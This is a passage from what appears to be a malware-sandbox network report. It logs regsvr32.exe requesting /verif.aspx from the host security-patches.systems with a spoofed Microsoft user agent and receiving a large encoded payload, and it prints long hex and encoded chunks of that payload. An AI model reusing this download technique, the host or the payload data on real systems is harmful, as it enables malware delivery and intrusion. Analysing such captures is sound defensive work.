                                              2024-12-06 21:19:45 UTC16384INData Raw: 58 49 68 2b 48 66 51 65 71 5a 77 35 4b 34 6e 4d 79 75 36 73 41 36 79 49 65 64 59 62 6b 34 4a 30 6f 33 38 79 66 44 32 6d 6d 39 4e 59 56 34 0d 0a 59 76 55 55 69 46 54 42 65 6f 6a 70 49 74 6a 30 50 62 58 49 68 2b 39 32 75 4f 6a 51 4a 73 69 48 6e 62 67 63 61 64 37 66 57 34 65 64 7a 4e 74 6a 33 55 75 36 39 51 72 4d 72 70 37 63 78 31 4f 48 0d 0a 6e 63 7a 61 4e 46 33 42 73 68 79 64 7a 4b 37 71 58 63 4e 39 66 4b 56 32 72 5a 36 71 74 63 6a 31 4c 2f 2b 35 73 42 4e 49 4e 33 66 55 5a 70 30 7a 32 41 66 6a 6b 43 61 34 55 32 48 65 44 7a 2b 52 0d 0a 69 44 64 52 59 64 34 50 78 2f 75 69 4e 39 6a 6b 4e 62 58 49 68 39 73 33 55 57 46 56 49 65 61 48 36 62 59 78 6e 71 71 31 4e 43 68 6d 75 73 51 39 71 72 58 49 38 2b 39 76 72 70 36 71 79 51 35 34 0d 0a 46 31 47 58 4a 4c 31 4b 38
                                              Data Ascii: XIh+HfQeqZw5K4nMyu6sA6yIedYbk4J0o38yfD2mm9NYV4YvUUiFTBeojpItj0PbXIh+92uOjQJsiHnbgcad7fW4edzNtj3Uu69QrMrp7cx1OHnczaNF3BshydzK7qXcN9fKV2rZ6qtcj1L/+5sBNIN3fUZp0z2AfjkCa4U2HeDz+RiDdRYd4Px/uiN9jkNbXIh9s3UWFVIeaH6bYxnqq1NChmusQ9qrXI8+9vrp6qyQ54F1GXJL1K8
                                              2024-12-06 21:19:45 UTC16384INData Raw: 67 63 69 64 61 4c 50 35 42 75 58 56 46 68 33 67 66 66 6b 4d 59 72 55 32 48 65 42 38 76 7a 0d 0a 61 39 75 72 34 6c 56 4b 76 43 32 65 75 46 4f 49 4d 55 67 33 65 4f 6c 32 72 65 4b 56 54 72 34 39 70 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 53 6c 56 68 6f 7a 38 54 66 7a 32 69 79 56 77 53 62 78 0d 0a 4e 34 2f 61 4a 4f 6e 4b 44 33 6f 58 4f 70 59 6b 6a 55 73 33 65 47 4c 59 56 71 59 51 6b 6a 64 34 59 6a 50 62 4c 49 33 43 65 6f 70 74 68 51 53 54 30 4a 68 43 4a 2b 6c 32 72 65 4b 56 54 72 34 39 0d 0a 32 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 54 5a 56 68 6f 7a 38 54 65 48 32 69 7a 68 77 53 62 78 4e 34 50 61 4a 4f 58 4b 44 33 6b 58 4f 70 59 6b 67 55 73 33 65 47 4c 59 56 71 59 51 6e 6a 64 34 0d 0a 59 6a 50 62 4c 49 48 43 65 6f 6c 74 68 51 53 51 30 4a 68 43 62 77 6f 79 51
                                              Data Ascii: gcidaLP5BuXVFh3gffkMYrU2HeB8vza9ur4lVKvC2euFOIMUg3eOl2reKVTr49popVYVVKXKmduBSlVhoz8Tfz2iyVwSbxN4/aJOnKD3oXOpYkjUs3eGLYVqYQkjd4YjPbLI3CeopthQST0JhCJ+l2reKVTr492opVYVVKXKmduBTZVhoz8TeH2izhwSbxN4PaJOXKD3kXOpYkgUs3eGLYVqYQnjd4YjPbLIHCeolthQSQ0JhCbwoyQ
                                              2024-12-06 21:19:45 UTC16384INData Raw: 2f 77 50 66 71 33 31 57 6c 46 77 58 4c 67 0d 0a 34 66 4e 51 36 4e 41 6d 79 59 65 64 75 42 7a 35 33 31 75 2f 4c 64 2b 77 46 50 6c 55 79 6b 72 46 59 6b 61 2f 36 68 44 53 48 50 30 4f 7a 61 36 65 33 4d 39 66 68 70 33 4d 32 75 77 39 74 4d 69 48 0d 0a 36 37 34 31 6e 36 71 31 76 4f 30 47 7a 61 36 65 33 4e 39 58 68 70 33 4d 32 75 51 31 74 4d 69 48 4d 6c 76 56 35 56 31 61 75 76 56 4b 7a 36 36 65 76 57 30 38 68 35 33 31 46 4a 31 44 78 37 70 51 0d 0a 6e 73 79 75 4d 44 39 61 75 75 33 69 79 61 36 65 42 38 46 36 69 49 72 34 64 57 4a 56 77 37 49 6b 6e 4d 79 75 36 74 41 57 79 59 65 64 75 74 51 35 71 37 58 49 76 69 66 50 52 75 6f 59 75 72 53 35 0d 0a 49 72 68 41 36 4d 41 65 79 6f 65 64 75 42 42 6c 33 4d 39 76 68 5a 33 4d 32 69 68 64 77 37 6f 6b 6e 38 79 75 37 4d 41 65 79
                                              Data Ascii: /wPfq31WlFwXLg4fNQ6NAmyYeduBz531u/Ld+wFPlUykrFYka/6hDSHP0Oza6e3M9fhp3M2uw9tMiH6741n6q1vO0Gza6e3N9Xhp3M2uQ1tMiHMlvV5V1auvVKz66evW08h531FJ1Dx7pQnsyuMD9auu3iya6eB8F6iIr4dWJVw7IknMyu6tAWyYedutQ5q7XIvifPRuoYurS5IrhA6MAeyoeduBBl3M9vhZ3M2ihdw7okn8yu7MAey
                                              2024-12-06 21:19:45 UTC16384INData Raw: 62 57 53 52 6b 31 70 62 64 53 43 4b 67 43 64 69 56 63 46 36 68 4f 70 79 4d 65 6f 51 74 72 79 64 50 2f 46 56 59 5a 6d 47 2b 37 51 33 75 4c 33 69 75 57 61 2b 4e 5a 36 34 46 47 6e 63 44 38 50 7a 0d 0a 4c 38 66 59 4c 49 48 42 59 6f 54 72 5a 71 48 71 45 4c 71 2b 50 5a 71 34 48 4a 6d 53 53 7a 64 34 59 6a 50 61 4e 4b 32 4e 64 58 78 69 4d 31 46 68 33 67 38 2f 38 32 71 36 48 49 33 65 48 39 76 78 0d 0a 4e 39 76 63 4a 4c 33 44 63 71 54 70 66 6c 6e 71 52 4d 45 31 38 53 66 58 32 69 79 78 77 33 71 59 37 32 61 78 36 41 43 53 76 44 32 2b 75 46 6b 77 33 68 2f 76 38 32 42 6a 32 69 79 70 6f 68 6d 62 0d 0a 6e 4d 7a 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 44 65 34 76 65 4b 35 58 72 34 31 6e 72 67 55 6e 64 77 50 77 2f 4d 76 78 39 67 73 72 63 46 69 67 4b 55 78 55
                                              Data Ascii: bWSRk1pbdSCKgCdiVcF6hOpyMeoQtrydP/FVYZmG+7Q3uL3iuWa+NZ64FGncD8PzL8fYLIHBYoTrZqHqELq+PZq4HJmSSzd4YjPaNK2NdXxiM1Fh3g8/82q6HI3eH9vxN9vcJL3DcqTpflnqRME18SfX2iyxw3qY72ax6ACSvD2+uFkw3h/v82Bj2iypohmbnMzaJKnB0iWgN1GtmYb7tDe4veK5Xr41nrgUndwPw/Mvx9gsrcFigKUxU
                                              2024-12-06 21:19:46 UTC16384INData Raw: 58 49 31 79 76 47 4d 7a 55 57 47 2b 54 66 41 39 70 6a 4e 52 59 56 58 41 63 72 79 4c 47 46 42 68 56 61 4d 54 65 57 49 7a 30 52 79 6d 54 45 49 35 0d 0a 34 6b 36 6a 5a 69 42 78 76 44 56 71 75 42 42 70 33 68 73 37 38 36 72 62 6d 77 5a 52 53 72 77 31 62 6c 56 65 54 78 52 43 71 49 36 6d 64 79 74 6f 6b 67 2f 33 65 57 49 7a 55 59 70 53 6a 58 4b 34 0d 0a 59 6a 4e 52 59 64 38 50 39 35 47 47 4d 31 46 68 76 4a 63 33 65 47 4b 7a 4c 4a 4a 53 50 33 54 34 48 38 46 58 46 47 6a 42 59 6e 54 70 65 56 6e 71 42 30 62 66 2f 51 55 33 55 65 6f 51 51 73 56 33 0d 0a 63 6e 74 5a 42 31 70 6b 2f 2b 65 55 39 78 55 62 58 49 31 79 78 47 4d 7a 55 57 47 2b 54 66 41 39 33 6a 4e 52 59 56 58 41 63 73 53 4c 71 46 46 68 56 61 4f 6a 65 47 49 7a 30 52 79 6d 54 45 49 39 0d 0a 34 6b 36 6a 5a 43 42
                                              Data Ascii: XI1yvGMzUWG+TfA9pjNRYVXAcryLGFBhVaMTeWIz0RymTEI54k6jZiBxvDVquBBp3hs786rbmwZRSrw1blVeTxRCqI6mdytokg/3eWIzUYpSjXK4YjNRYd8P95GGM1FhvJc3eGKzLJJSP3T4H8FXFGjBYnTpeVnqB0bf/QU3UeoQQsV3cntZB1pk/+eU9xUbXI1yxGMzUWG+TfA93jNRYVXAcsSLqFFhVaOjeGIz0RymTEI94k6jZCB


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.449733185.234.216.1754434940C:\Windows\SysWOW64\regsvr32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-06 21:19:46 UTC117OUTGET /verif.aspx HTTP/1.1
                                              User-Agent: Microsoft-WNS/11.0
                                              Host: security-patches.systems
                                              Cache-Control: no-cache
                                              2024-12-06 21:19:47 UTC252INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:19:47 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              Last-Modified: Sat, 23 Nov 2024 15:29:11 GMT
                                              ETag: "d75c4-62796294faafa"
                                              Accept-Ranges: bytes
                                              Content-Length: 882116
                                              Connection: close
                                              2024-12-06 21:19:47 UTC7940INData Raw: 4c 32 6e 42 59 56 5a 4b 4e 33 68 6d 4d 31 46 68 71 72 55 33 65 4e 6f 7a 55 57 46 56 53 6a 64 34 49 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 56 55 6f 33 65 47 49 7a 55 57 46 56 53 6a 64 34 0d 0a 59 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 58 55 73 33 65 47 77 73 36 32 39 56 2f 6a 36 31 51 34 74 51 4c 5a 68 72 59 78 41 4c 51 48 45 52 4a 79 56 51 43 67 4e 65 63 51 49 30 4a 46 6b 58 0d 0a 46 68 4d 7a 42 48 55 34 51 68 5a 43 57 6a 39 42 45 51 56 6b 57 41 39 63 4e 51 52 37 52 7a 70 79 52 6a 4e 52 59 56 56 4b 4e 33 68 48 2f 76 68 4f 4e 4f 62 77 42 41 4f 66 6c 68 30 30 35 76 41 45 0d 0a 30 4f 32 56 48 44 2f 6d 38 41 54 51 37 5a 4d 63 6c 65 62 77 42 41 55 65 6b 68 77 6b 35 76 41 45 42 52 36 56 48 43 48 6d 38 41 54 51 37 5a 49 63 49 75 62 77 42 41 55 65 6b
                                              Data Ascii: L2nBYVZKN3hmM1FhqrU3eNozUWFVSjd4IjNRYVVKN3hiM1FhVUo3eGIzUWFVSjd4YjNRYVVKN3hiM1FhXUs3eGws629V/j61Q4tQLZhrYxALQHERJyVQCgNecQI0JFkXFhMzBHU4QhZCWj9BEQVkWA9cNQR7RzpyRjNRYVVKN3hH/vhONObwBAOflh005vAE0O2VHD/m8ATQ7ZMclebwBAUekhwk5vAEBR6VHCHm8ATQ7ZIcIubwBAUek
                                              2024-12-06 21:19:47 UTC16384INData Raw: 2b 36 59 2f 32 69 79 70 6f 6c 46 35 59 54 50 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 4b 37 2f 6e 61 32 5a 68 76 75 30 0d 0a 4e 37 69 39 34 72 6c 69 76 6a 57 65 41 4a 48 71 47 4c 61 2b 65 65 74 79 56 65 67 55 51 72 77 74 6e 76 51 54 5a 56 52 4b 4e 33 6a 70 64 71 32 6d 46 55 49 32 65 47 49 7a 32 69 79 70 6a 54 61 63 0d 0a 38 54 74 42 36 67 42 47 76 69 32 4b 75 42 52 70 33 41 2f 54 38 79 2f 50 30 71 42 5a 77 33 71 55 36 57 61 39 36 41 43 79 76 44 32 4b 75 68 53 42 33 67 66 54 38 53 2f 76 32 6a 53 31 77 54 58 78 0d 0a 4a 2b 76 61 4c 49 6e 42 4a 76 45 33 78 39 6f 6b 72 59 30 33 2f 42 51 37 51 65 6f 59 73 76 42 35 69 6b 56 5a 63 64 34 66 7a 2f 4d 6e 78 39 67 6a 55 63 6c 4b 6a 47 4a 47 57 4b 59 51 75 6a 64 34 0d 0a 59 6a 4f 36 61 4e 34 48 77 33 73
                                              Data Ascii: +6Y/2iypolF5YTPaJKnB0iWgN1GtmYb7tK7/na2Zhvu0N7i94rlivjWeAJHqGLa+eetyVegUQrwtnvQTZVRKN3jpdq2mFUI2eGIz2iypjTac8TtB6gBGvi2KuBRp3A/T8y/P0qBZw3qU6Wa96ACyvD2KuhSB3gfT8S/v2jS1wTXxJ+vaLInBJvE3x9okrY03/BQ7QeoYsvB5ikVZcd4fz/Mnx9gjUclKjGJGWKYQujd4YjO6aN4Hw3s
                                              2024-12-06 21:19:47 UTC16384INData Raw: 36 51 43 30 4f 4d 34 6e 7a 64 53 68 49 52 48 77 50 62 6f 7a 55 57 46 56 77 58 70 6f 0d 0a 36 33 36 39 36 67 42 47 76 69 32 53 75 42 53 52 33 41 2f 37 38 79 2f 66 32 43 79 46 78 32 4b 30 36 32 61 78 70 68 43 65 4e 33 68 69 4d 39 6f 6b 64 63 4e 79 6e 4f 6c 2b 54 65 67 59 6f 72 77 74 0d 0a 69 72 6f 45 70 64 34 50 30 2f 45 6e 2b 39 77 73 6b 63 4e 36 70 4f 6c 6d 73 54 50 65 42 2b 75 51 52 67 35 51 59 62 78 64 79 49 65 64 75 42 52 70 33 67 63 72 38 7a 63 54 32 47 6e 63 47 6a 50 7a 0d 0a 4a 7a 76 61 68 41 69 4a 2b 37 53 75 2f 35 32 74 6d 59 62 37 74 44 65 34 76 54 79 57 68 76 75 30 72 76 2b 64 72 5a 6d 47 2b 37 51 33 75 4c 30 77 76 6b 4f 38 50 57 71 77 6b 58 48 63 44 7a 2f 7a 0d 0a 4c 7a 74 71 4c 46 6b 2b 41 50 4d 33 4f 39 67 30 71 63 46 36 68 49 6f 59 67 32 4e
                                              Data Ascii: 6QC0OM4nzdShIRHwPbozUWFVwXpo63696gBGvi2SuBSR3A/78y/f2CyFx2K062axphCeN3hiM9okdcNynOl+TegYorwtiroEpd4P0/En+9wskcN6pOlmsTPeB+uQRg5QYbxdyIeduBRp3gcr8zcT2GncGjPzJzvahAiJ+7Su/52tmYb7tDe4vTyWhvu0rv+drZmG+7Q3uL0wvkO8PWqwkXHcDz/zLztqLFk+APM3O9g0qcF6hIoYg2N
                                              2024-12-06 21:19:47 UTC16384INData Raw: 61 4f 75 6d 51 5a 36 71 74 62 37 39 0d 0a 64 73 79 75 6e 72 35 44 76 44 58 36 73 4c 68 67 33 41 65 76 2b 78 2b 72 55 52 64 4c 78 36 4a 6f 6e 63 79 75 36 4d 44 36 79 59 65 64 50 4f 63 6b 54 52 71 38 39 64 4c 4e 72 70 36 39 64 53 5a 35 0d 0a 59 74 69 43 36 74 68 61 79 49 65 64 75 4d 52 31 71 72 58 49 38 65 39 37 72 35 36 71 77 36 49 30 6e 4d 79 75 36 74 41 43 79 59 65 64 75 4e 77 74 71 37 58 49 38 53 63 2f 32 43 78 46 6a 58 4b 67 0d 0a 59 6a 4e 52 59 62 79 78 4e 33 68 69 76 73 52 42 71 37 58 49 38 54 65 6e 32 69 54 42 77 37 4a 41 6e 63 79 75 36 68 6a 65 74 41 46 32 50 43 64 74 6b 73 38 4c 68 35 33 4d 55 47 46 56 53 74 78 79 0d 0a 70 62 5a 74 6e 71 71 31 4e 33 68 69 4d 39 76 30 61 62 58 49 68 2b 70 6d 75 57 37 6a 44 39 2f 39 6f 6b 64 47 36 68 6a 65 76 47 6e
                                              Data Ascii: aOumQZ6qtb79dsyunr5DvDX6sLhg3Aev+x+rURdLx6Joncyu6MD6yYedPOckTRq89dLNrp69dSZ5YtiC6thayIeduMR1qrXI8e97r56qw6I0nMyu6tACyYeduNwtq7XI8Sc/2CxFjXKgYjNRYbyxN3hivsRBq7XI8Ten2iTBw7JAncyu6hjetAF2PCdtks8Lh53MUGFVStxypbZtnqq1N3hiM9v0abXIh+pmuW7jD9/9okdG6hjevGn
                                              2024-12-06 21:19:47 UTC16384INData Raw: 67 55 74 64 35 43 76 6a 4a 6d 39 42 53 64 56 55 6f 33 65 4f 6c 6d 57 65 67 41 68 72 77 39 7a 72 6f 55 73 64 34 48 35 2f 45 76 39 39 6f 30 6d 63 4e 69 6b 4f 6c 32 75 65 67 51 67 72 77 31 0d 0a 71 72 6f 63 30 64 67 66 78 53 72 70 64 72 6b 78 33 67 66 7a 6b 49 35 4f 72 70 34 2f 53 72 6f 31 79 6d 4b 35 6b 4e 32 31 79 50 75 6d 4f 31 37 58 68 63 2f 6c 44 58 56 62 52 31 31 56 53 6c 2b 49 0d 0a 46 44 74 42 43 65 33 47 50 32 69 4b 38 32 64 6e 56 63 6e 7a 64 4b 56 32 6b 57 46 56 53 6a 66 31 4c 35 2f 59 4c 4c 48 42 59 70 7a 70 4d 64 67 6b 36 63 46 36 6e 4f 6c 6d 6b 65 68 45 77 58 4c 45 0d 0a 36 33 62 70 36 68 6a 79 76 6a 58 57 39 42 53 64 71 72 58 49 68 2b 39 2b 2b 59 6d 64 6b 7a 64 34 36 58 62 6c 36 68 69 2b 55 2f 46 76 4d 31 46 68 56 63 48 53 4a 61 48 2f 6e 61 32
                                              Data Ascii: gUtd5CvjJm9BSdVUo3eOlmWegAhrw9zroUsd4H5/Ev99o0mcNikOl2uegQgrw1qroc0dgfxSrpdrkx3gfzkI5Orp4/Sro1ymK5kN21yPumO17Xhc/lDXVbR11VSl+IFDtBCe3GP2iK82dnVcnzdKV2kWFVSjf1L5/YLLHBYpzpMdgk6cF6nOlmkehEwXLE63bp6hjyvjXW9BSdqrXIh+9++Ymdkzd46Xbl6hi+U/FvM1FhVcHSJaH/na2
                                              2024-12-06 21:19:47 UTC16384INData Raw: 58 49 68 2b 48 66 51 65 71 5a 77 35 4b 34 6e 4d 79 75 36 73 41 36 79 49 65 64 59 62 6b 34 4a 30 6f 33 38 79 66 44 32 6d 6d 39 4e 59 56 34 0d 0a 59 76 55 55 69 46 54 42 65 6f 6a 70 49 74 6a 30 50 62 58 49 68 2b 39 32 75 4f 6a 51 4a 73 69 48 6e 62 67 63 61 64 37 66 57 34 65 64 7a 4e 74 6a 33 55 75 36 39 51 72 4d 72 70 37 63 78 31 4f 48 0d 0a 6e 63 7a 61 4e 46 33 42 73 68 79 64 7a 4b 37 71 58 63 4e 39 66 4b 56 32 72 5a 36 71 74 63 6a 31 4c 2f 2b 35 73 42 4e 49 4e 33 66 55 5a 70 30 7a 32 41 66 6a 6b 43 61 34 55 32 48 65 44 7a 2b 52 0d 0a 69 44 64 52 59 64 34 50 78 2f 75 69 4e 39 6a 6b 4e 62 58 49 68 39 73 33 55 57 46 56 49 65 61 48 36 62 59 78 6e 71 71 31 4e 43 68 6d 75 73 51 39 71 72 58 49 38 2b 39 76 72 70 36 71 79 51 35 34 0d 0a 46 31 47 58 4a 4c 31 4b 38
                                              Data Ascii: XIh+HfQeqZw5K4nMyu6sA6yIedYbk4J0o38yfD2mm9NYV4YvUUiFTBeojpItj0PbXIh+92uOjQJsiHnbgcad7fW4edzNtj3Uu69QrMrp7cx1OHnczaNF3BshydzK7qXcN9fKV2rZ6qtcj1L/+5sBNIN3fUZp0z2AfjkCa4U2HeDz+RiDdRYd4Px/uiN9jkNbXIh9s3UWFVIeaH6bYxnqq1NChmusQ9qrXI8+9vrp6qyQ54F1GXJL1K8
                                              2024-12-06 21:19:47 UTC16384INData Raw: 67 63 69 64 61 4c 50 35 42 75 58 56 46 68 33 67 66 66 6b 4d 59 72 55 32 48 65 42 38 76 7a 0d 0a 61 39 75 72 34 6c 56 4b 76 43 32 65 75 46 4f 49 4d 55 67 33 65 4f 6c 32 72 65 4b 56 54 72 34 39 70 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 53 6c 56 68 6f 7a 38 54 66 7a 32 69 79 56 77 53 62 78 0d 0a 4e 34 2f 61 4a 4f 6e 4b 44 33 6f 58 4f 70 59 6b 6a 55 73 33 65 47 4c 59 56 71 59 51 6b 6a 64 34 59 6a 50 62 4c 49 33 43 65 6f 70 74 68 51 53 54 30 4a 68 43 4a 2b 6c 32 72 65 4b 56 54 72 34 39 0d 0a 32 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 54 5a 56 68 6f 7a 38 54 65 48 32 69 7a 68 77 53 62 78 4e 34 50 61 4a 4f 58 4b 44 33 6b 58 4f 70 59 6b 67 55 73 33 65 47 4c 59 56 71 59 51 6e 6a 64 34 0d 0a 59 6a 50 62 4c 49 48 43 65 6f 6c 74 68 51 53 51 30 4a 68 43 62 77 6f 79 51
                                              Data Ascii: gcidaLP5BuXVFh3gffkMYrU2HeB8vza9ur4lVKvC2euFOIMUg3eOl2reKVTr49popVYVVKXKmduBSlVhoz8Tfz2iyVwSbxN4/aJOnKD3oXOpYkjUs3eGLYVqYQkjd4YjPbLI3CeopthQST0JhCJ+l2reKVTr492opVYVVKXKmduBTZVhoz8TeH2izhwSbxN4PaJOXKD3kXOpYkgUs3eGLYVqYQnjd4YjPbLIHCeolthQSQ0JhCbwoyQ
                                              2024-12-06 21:19:47 UTC16384INData Raw: 2f 77 50 66 71 33 31 57 6c 46 77 58 4c 67 0d 0a 34 66 4e 51 36 4e 41 6d 79 59 65 64 75 42 7a 35 33 31 75 2f 4c 64 2b 77 46 50 6c 55 79 6b 72 46 59 6b 61 2f 36 68 44 53 48 50 30 4f 7a 61 36 65 33 4d 39 66 68 70 33 4d 32 75 77 39 74 4d 69 48 0d 0a 36 37 34 31 6e 36 71 31 76 4f 30 47 7a 61 36 65 33 4e 39 58 68 70 33 4d 32 75 51 31 74 4d 69 48 4d 6c 76 56 35 56 31 61 75 76 56 4b 7a 36 36 65 76 57 30 38 68 35 33 31 46 4a 31 44 78 37 70 51 0d 0a 6e 73 79 75 4d 44 39 61 75 75 33 69 79 61 36 65 42 38 46 36 69 49 72 34 64 57 4a 56 77 37 49 6b 6e 4d 79 75 36 74 41 57 79 59 65 64 75 74 51 35 71 37 58 49 76 69 66 50 52 75 6f 59 75 72 53 35 0d 0a 49 72 68 41 36 4d 41 65 79 6f 65 64 75 42 42 6c 33 4d 39 76 68 5a 33 4d 32 69 68 64 77 37 6f 6b 6e 38 79 75 37 4d 41 65 79
                                              Data Ascii: /wPfq31WlFwXLg4fNQ6NAmyYeduBz531u/Ld+wFPlUykrFYka/6hDSHP0Oza6e3M9fhp3M2uw9tMiH6741n6q1vO0Gza6e3N9Xhp3M2uQ1tMiHMlvV5V1auvVKz66evW08h531FJ1Dx7pQnsyuMD9auu3iya6eB8F6iIr4dWJVw7IknMyu6tAWyYedutQ5q7XIvifPRuoYurS5IrhA6MAeyoeduBBl3M9vhZ3M2ihdw7okn8yu7MAey
                                              2024-12-06 21:19:47 UTC16384INData Raw: 62 57 53 52 6b 31 70 62 64 53 43 4b 67 43 64 69 56 63 46 36 68 4f 70 79 4d 65 6f 51 74 72 79 64 50 2f 46 56 59 5a 6d 47 2b 37 51 33 75 4c 33 69 75 57 61 2b 4e 5a 36 34 46 47 6e 63 44 38 50 7a 0d 0a 4c 38 66 59 4c 49 48 42 59 6f 54 72 5a 71 48 71 45 4c 71 2b 50 5a 71 34 48 4a 6d 53 53 7a 64 34 59 6a 50 61 4e 4b 32 4e 64 58 78 69 4d 31 46 68 33 67 38 2f 38 32 71 36 48 49 33 65 48 39 76 78 0d 0a 4e 39 76 63 4a 4c 33 44 63 71 54 70 66 6c 6e 71 52 4d 45 31 38 53 66 58 32 69 79 78 77 33 71 59 37 32 61 78 36 41 43 53 76 44 32 2b 75 46 6b 77 33 68 2f 76 38 32 42 6a 32 69 79 70 6f 68 6d 62 0d 0a 6e 4d 7a 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 44 65 34 76 65 4b 35 58 72 34 31 6e 72 67 55 6e 64 77 50 77 2f 4d 76 78 39 67 73 72 63 46 69 67 4b 55 78 55
                                              Data Ascii: bWSRk1pbdSCKgCdiVcF6hOpyMeoQtrydP/FVYZmG+7Q3uL3iuWa+NZ64FGncD8PzL8fYLIHBYoTrZqHqELq+PZq4HJmSSzd4YjPaNK2NdXxiM1Fh3g8/82q6HI3eH9vxN9vcJL3DcqTpflnqRME18SfX2iyxw3qY72ax6ACSvD2+uFkw3h/v82Bj2iypohmbnMzaJKnB0iWgN1GtmYb7tDe4veK5Xr41nrgUndwPw/Mvx9gsrcFigKUxU
                                              2024-12-06 21:19:47 UTC16384INData Raw: 58 49 31 79 76 47 4d 7a 55 57 47 2b 54 66 41 39 70 6a 4e 52 59 56 58 41 63 72 79 4c 47 46 42 68 56 61 4d 54 65 57 49 7a 30 52 79 6d 54 45 49 35 0d 0a 34 6b 36 6a 5a 69 42 78 76 44 56 71 75 42 42 70 33 68 73 37 38 36 72 62 6d 77 5a 52 53 72 77 31 62 6c 56 65 54 78 52 43 71 49 36 6d 64 79 74 6f 6b 67 2f 33 65 57 49 7a 55 59 70 53 6a 58 4b 34 0d 0a 59 6a 4e 52 59 64 38 50 39 35 47 47 4d 31 46 68 76 4a 63 33 65 47 4b 7a 4c 4a 4a 53 50 33 54 34 48 38 46 58 46 47 6a 42 59 6e 54 70 65 56 6e 71 42 30 62 66 2f 51 55 33 55 65 6f 51 51 73 56 33 0d 0a 63 6e 74 5a 42 31 70 6b 2f 2b 65 55 39 78 55 62 58 49 31 79 78 47 4d 7a 55 57 47 2b 54 66 41 39 33 6a 4e 52 59 56 58 41 63 73 53 4c 71 46 46 68 56 61 4f 6a 65 47 49 7a 30 52 79 6d 54 45 49 39 0d 0a 34 6b 36 6a 5a 43 42
                                              Data Ascii: XI1yvGMzUWG+TfA9pjNRYVXAcryLGFBhVaMTeWIz0RymTEI54k6jZiBxvDVquBBp3hs786rbmwZRSrw1blVeTxRCqI6mdytokg/3eWIzUYpSjXK4YjNRYd8P95GGM1FhvJc3eGKzLJJSP3T4H8FXFGjBYnTpeVnqB0bf/QU3UeoQQsV3cntZB1pk/+eU9xUbXI1yxGMzUWG+TfA93jNRYVXAcsSLqFFhVaOjeGIz0RymTEI94k6jZCB


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.449780185.234.216.1754432500C:\Windows\SysWOW64\regsvr32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-06 21:20:44 UTC117OUTGET /verif.aspx HTTP/1.1
                                              User-Agent: Microsoft-WNS/11.0
                                              Host: security-patches.systems
                                              Cache-Control: no-cache
                                              2024-12-06 21:20:45 UTC252INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:44 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              Last-Modified: Sat, 23 Nov 2024 15:29:11 GMT
                                              ETag: "d75c4-62796294faafa"
                                              Accept-Ranges: bytes
                                              Content-Length: 882116
                                              Connection: close
                                              2024-12-06 21:20:45 UTC7940INData Raw: 4c 32 6e 42 59 56 5a 4b 4e 33 68 6d 4d 31 46 68 71 72 55 33 65 4e 6f 7a 55 57 46 56 53 6a 64 34 49 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 56 55 6f 33 65 47 49 7a 55 57 46 56 53 6a 64 34 0d 0a 59 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 58 55 73 33 65 47 77 73 36 32 39 56 2f 6a 36 31 51 34 74 51 4c 5a 68 72 59 78 41 4c 51 48 45 52 4a 79 56 51 43 67 4e 65 63 51 49 30 4a 46 6b 58 0d 0a 46 68 4d 7a 42 48 55 34 51 68 5a 43 57 6a 39 42 45 51 56 6b 57 41 39 63 4e 51 52 37 52 7a 70 79 52 6a 4e 52 59 56 56 4b 4e 33 68 48 2f 76 68 4f 4e 4f 62 77 42 41 4f 66 6c 68 30 30 35 76 41 45 0d 0a 30 4f 32 56 48 44 2f 6d 38 41 54 51 37 5a 4d 63 6c 65 62 77 42 41 55 65 6b 68 77 6b 35 76 41 45 42 52 36 56 48 43 48 6d 38 41 54 51 37 5a 49 63 49 75 62 77 42 41 55 65 6b
                                              Data Ascii: L2nBYVZKN3hmM1FhqrU3eNozUWFVSjd4IjNRYVVKN3hiM1FhVUo3eGIzUWFVSjd4YjNRYVVKN3hiM1FhXUs3eGws629V/j61Q4tQLZhrYxALQHERJyVQCgNecQI0JFkXFhMzBHU4QhZCWj9BEQVkWA9cNQR7RzpyRjNRYVVKN3hH/vhONObwBAOflh005vAE0O2VHD/m8ATQ7ZMclebwBAUekhwk5vAEBR6VHCHm8ATQ7ZIcIubwBAUek
                                              2024-12-06 21:20:45 UTC16384INData Raw: 2b 36 59 2f 32 69 79 70 6f 6c 46 35 59 54 50 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 4b 37 2f 6e 61 32 5a 68 76 75 30 0d 0a 4e 37 69 39 34 72 6c 69 76 6a 57 65 41 4a 48 71 47 4c 61 2b 65 65 74 79 56 65 67 55 51 72 77 74 6e 76 51 54 5a 56 52 4b 4e 33 6a 70 64 71 32 6d 46 55 49 32 65 47 49 7a 32 69 79 70 6a 54 61 63 0d 0a 38 54 74 42 36 67 42 47 76 69 32 4b 75 42 52 70 33 41 2f 54 38 79 2f 50 30 71 42 5a 77 33 71 55 36 57 61 39 36 41 43 79 76 44 32 4b 75 68 53 42 33 67 66 54 38 53 2f 76 32 6a 53 31 77 54 58 78 0d 0a 4a 2b 76 61 4c 49 6e 42 4a 76 45 33 78 39 6f 6b 72 59 30 33 2f 42 51 37 51 65 6f 59 73 76 42 35 69 6b 56 5a 63 64 34 66 7a 2f 4d 6e 78 39 67 6a 55 63 6c 4b 6a 47 4a 47 57 4b 59 51 75 6a 64 34 0d 0a 59 6a 4f 36 61 4e 34 48 77 33 73
